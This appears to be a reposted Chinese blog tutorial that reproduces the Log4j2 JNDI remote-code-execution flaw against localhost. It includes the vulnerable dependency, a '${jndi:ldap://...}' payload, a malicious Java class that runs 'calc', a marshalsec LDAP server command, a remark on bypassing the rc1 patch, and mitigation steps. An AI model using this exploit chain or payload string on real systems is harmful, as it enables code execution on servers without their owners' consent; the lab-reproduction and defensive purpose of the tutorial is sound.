手把手教你复现Log4j2漏洞,千万别中招!

最新推荐文章于 2024-05-11 10:15:57 发布
最新推荐文章于 2024-05-11 10:15:57 发布
阅读量306 收藏
点赞数
文章标签: java maven 大数据 spring spring boot
原文链接:https://mp.weixin.qq.com/s?__biz=MzA3OTc0MzY1Mg==&mid=2247524813&idx=4&sn=4aebdf8b18edcf7734eaf9ca94f65082&chksm=9facfe06a8db7710ab31b8c32105d9b5d5d58a49da62347bd552d39a02419ddea17a6e0bfa14&scene=126&&sessionid=0
版权

f8b757dcf2f347f700b116dfc979aaf5.png

来源:blog.csdn.net/qq_40989258/article/

details/121862363

0x00 简介

ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。

0x01 漏洞概述

该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。

0x02 影响范围

Apache Log4j 2.x <= 2.15.0-rc1

0x03 环境搭建

创建一个新的maven项目,并导入Log4j的依赖包

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>
bcb4b7cf66fadf4e10fb99b9fe09c9e1.png

0x04 漏洞利用

1、使用POC测试

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
class LogTest {
    public static final Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        logger.error("${jndi:ldap://localhost:8888/Exploit}");
    }
}

2、编译一恶意类Exploit.class

首先新建exp.java,然后编译为class文件

class Exploit {
    static {
        System.err.println("Pwned");
        try {
            String cmds = "calc";
            Runtime.getRuntime().exec(cmds);
        } catch ( Exception e ) {
            e.printStackTrace();
        }
    }
}

javac exp.java

c2817624b16d0812e4278d5343c99258.png

3、使用marshalsec-0.0.3-SNAPSHOT-all.jar本地开启一个LDAP服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
"http://127.0.0.1:7777/#Exploit" 8888
3767e7d44a0231cefe3d57237b69ad4b.png

4、运行poc.java,即可访问恶意类并执行写在其中的"calc"命令

84541306738d5ca41bf5b07cc003960a.png

结合一些其它 StrLookup 适当变形,以及配合官方测试用例中脏数据"?Type=A Type&Name=1100110&Char=!"可绕过rc1,RC2版本对此异常进行了捕获。

https://github.com/apache/logging-log4j2/compare/log4j-2.15.0-rc1...log4j-2.15.0-rc2

67115390c58f1588e3214a09c90d87f4.png

0x05 修复方式

目前,Apache官方已发布新版本完成漏洞修复,建议用户尽快进行自查,并及时升级至最新版本:

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

建议同时采用如下临时措施进行漏洞防范:

1)添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true;

2)在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true;

3)JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;

4)部署使用第三方防火墙产品进行安全防护。

推荐阅读:

世界的真实格局分析,地球人类社会底层运行原理

不是你需要中台,而是一名合格的架构师(附各大厂中台建设PPT)

企业IT技术架构规划方案

论数字化转型——转什么,如何转?

华为干部与人才发展手册(附PPT)

企业10大管理流程图,数字化转型从业者必备!

【中台实践】华为大数据中台架构分享.pdf

华为的数字化转型方法论

华为如何实施数字化转型(附PPT)

超详细280页Docker实战文档!开放下载

华为大数据解决方案(PPT)

304a09f79deaee64598a97709e2181f5.png

公众号:肉眼品世界
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
log4j漏洞原理及攻击流程
weixin_54603520的博客
05-14 2277
log4j漏洞最早出在2021年11月24日一位阿里安全团队的员工发的,上报到Apache之后,12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastjson漏洞
log4j2原理分析及漏洞
HUANGXIN9898的博客
10-23 827
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶意请求,触发远程代码执行漏洞,从而获得目标服务器权限。在java最常用的日志框架是log4j2和logback,其log4j2支持。
[CVE-2021-45105] Apache Log4j2 漏洞与原理详细分析
Specif1c的博客
08-10 1604
2021年12月9日,各大公司都被一个核弹级漏洞惊醒了,该漏洞一旦被攻击者利用就会造成及其严重的影响。该漏洞甚至被认为可能是“计算机历史上最大的漏洞”。
Log4j2漏洞(CVE-2021-44228)
最新发布
qq_40860153的博客
05-11 472
3、解析到ldap,就会去192.168.96.1:1099的ldap服务找名为shell的资源,找到shell之后,就会将资源信息返回给应用程序的log4j组件,而log4j组件就会将资源下载下来,然后发shell是一个.class文件,就会去执行里面的代码,从而实注入。在log4j框架的基础上进行了改进,并引入了丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。观察dns网站解析日志结果,刷新,发解析成功,说明漏洞存在。
log4j漏洞
fulong0406的博客
01-04 554
最新消息!根据Log4j官网发布,2.17.0版本还存在漏洞! 上图来自Log4j2官网:Log4j – Apache Log4j 2 漏洞编号:CVE-2021-44832 漏洞内容:Log4j2提供的JDBCAppender功能,将日志信息写入数据库,这个过程需要JNDI的支持,故攻击者可以利用此来执行任意代码。 危害等级: 影响范围:2.17.0及以下版本(不包含2.12.4、2.3.2) 修措施:升级Log4j2的版本 Java 8或之后用户升级到最新的2.17.1 Jav
Log4j2 重大漏洞与解决方案
热门推荐
小夏陌的博客
12-14 7万+
从12月10日(上周五)开始,朋友圈,各种论坛、公众号和群,都在讨论一个Log4j的漏洞,多少程序员半夜爬起来改代码,甚至威胁到了全球网络安全。为什么这个漏洞反应这么强烈呢?
手把手你学dsp2812,手把手你学dsp2812pdf下载,C,C++
09-10
手把手你学2812,很全面的一本书。电子版,适合初学者学习,
手把手你使用log4j
03-28
你如何使用log4j,有详细代码,图解等。
图文手把手你一步步用VC++2010编写通达信缠论插件(2-K线包含处理).pdf
11-17
图文手把手你一步步用VC++2010编写通达信缠论插件(2-K线包含处理).pdf
说明(必看!手把手你做问答系列).txt
01-09
这是手把手你做问答系列的资源。 系列专题:https://blog.csdn.net/weixin_43233491/category_9656513.html
手把手你MFC编程计算器制作程.pdf
11-17
手把手你MFC编程计算器制作程.pdf
marshalsec-0.0.3-SNAPSHOT-all.jar
12-14
marshalsec-0.0.3-SNAPSHOT-all.jar,渗透测试
log4j2漏洞(CVE-2021-44228)
weixin_45585955的博客
05-11 7451
一、原理介绍 由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实目标服务器的任意代码执行,获得目标服务器权限。 二、vulfocus靶场安装 docker pull vulfocus/vulfocus:latest docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.16..
log4j CVE-2019-17571 漏洞
01-02 1万+
一、漏洞描述 Log4j1.2版本包含一个SocketServer类,在未经验证的情况下,该SocketServe类很容易接受序列化的日志事件并对其进行反序列化,在结合反序列化工具使用时,可以利用该类远程执行任意代码。 二、漏洞 2.1 启动SocketServer端 import org.apache.log4j.Logger; import org.apache.log...
log4j2 jndi注入漏洞
朴实,坚持,兴趣
12-12 9934
log4j2 jndi注入漏洞
Log4j2漏洞
qq_20025777的博客
12-10 2万+
Log4j2漏洞危害:高危、远程代码执行
log4j2(四) - 日志位置是怎么获取到的?有什么影响?
sweetyi的专栏
03-16 1174
日志的位置信息包含哪些? %C or $class:类名 %F or %file:文件名 %L or %line:打印日志的方法所在文件的行数 %M or %method:打印日志的方法名 %l or %location:包含以上的位置信息 打印日志位置有什么影响? 官方文档上强调了三遍,位置使用要慎用慎用。相比于不使用位置信息: 对于同步日志来说,速度要慢3~5倍 对于异步日志来说,速度要...
log4j2 jndi ldap漏洞
Tango小黄的博客
12-16 4578
2021年12月9日,apache log4j2项目爆出重大安全漏洞,如何呢?
手把手你alexnet
10-08
手把手AlexNet的具体步骤如下: 1. 导入所需的库和模块,包括PaddlePaddle库和相关数据处理库。 2. 准备数据集,包括下载和解压数据集,对数据进行预处理,划分训练集和验证集。 3. 定义AlexNet网络结构,包括卷积层、池化层、全连接层等。 4. 配置训练参数,包括学习率、批次大小、迭代次数等。 5. 定义损失函数和优化器,使用交叉熵损失函数和随机梯度下降优化器。 6. 进行模型训练,包括前向传播、反向传播和参数更新。 7. 在验证集上进行模型评估,计算准确率等指标。 8. 保存和加载模型,方便后续的模型使用和迁移学习。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值